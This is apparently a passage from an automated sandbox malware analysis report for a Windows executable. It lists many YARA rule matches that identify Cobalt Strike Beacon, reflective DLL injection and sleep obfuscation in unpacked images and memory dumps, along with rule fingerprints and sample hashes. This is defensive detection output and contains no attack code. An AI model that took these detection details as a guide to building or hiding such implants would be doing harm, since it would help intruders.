Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0D9F6C	0_2_00007FF66E0D9F6C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFDDE4B	0_2_00007FF66DFDDE4B

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66DFB5980 appears 131 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66E21E9A6 appears 187 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66DFB68F0 appears 47 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66E02B329 appears 46 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66DFFBB07 appears 48 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66DFB5720 appears 68 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66DFB0B10 appears 250 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66E21EFC0 appears 70 times
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: String function: 00007FF66E1756F3 appears 169 times

Source: Z9fvmHepQC.exe

Static PE information: Number of sections : 13 > 10

Source: Z9fvmHepQC.exe, 00000000.00000000.2007291800.00007FF66E496000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameihome.exeZ vs Z9fvmHepQC.exe
Source: Z9fvmHepQC.exe	Binary or memory string: OriginalFilenameihome.exeZ vs Z9fvmHepQC.exe

Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2009341237.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2009488257.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2009315322.00000215D77ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
